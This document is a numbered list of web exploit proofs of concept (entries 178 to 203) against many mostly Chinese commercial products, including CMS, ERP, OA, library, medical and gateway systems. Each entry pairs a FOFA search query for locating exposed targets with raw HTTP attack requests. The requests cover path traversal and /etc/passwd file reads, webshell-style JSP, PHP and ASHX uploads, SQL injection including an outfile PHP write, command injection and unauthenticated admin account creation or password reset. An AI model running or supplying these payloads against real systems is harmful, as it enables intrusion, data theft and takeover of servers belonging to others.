/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C Campus Network Self-Service System flexFileUpload Arbitrary File Upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. Jianwen (建文) Engineering Management System Arbitrary File Read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=1

180. Bangguanke CRM (帮管客CRM) jiliyu SQL Injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. Runshen (润申) Information Technology Enterprise Standardization Management System UpdataLogHandler.ashx SQL Injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. Runshen (润申) Technology Enterprise Standardization Management System AddNewsHandler.ashx Arbitrary User Creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. Guangzhou Tuchuang (图创) Library Cluster Management System updOpuserPw SQL Injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. Xunrao (迅饶) Technology X2Modbus Gateway AddUser Arbitrary User Addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. Realor (瑞友) Tianyi Application Virtualization System SQL Injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL Injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation installations.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL Injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. Santi Jiahui (叁体-佳会) Video Conferencing attachment Arbitrary File Read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. Lanwon (蓝网科技) Clinical Viewing System deleteStudy SQL Injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short Video Matrix Marketing System (短视频矩阵营销系统) poihuoqu Arbitrary File Read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. ESafeNet (亿赛通) Electronic Document Security Management System NavigationAjax SQL Injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. 山石网科 云鉴 Security Management System setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE Enterprise Operations Management Platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet gets a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 Internet Access Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (Aliyun Drive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit system assetsmanager_upload endpoint file upload

1. Run the PoC to obtain the CSRF token, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1
Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get the cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) Omnimedia News Editing System binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"

-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云 EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--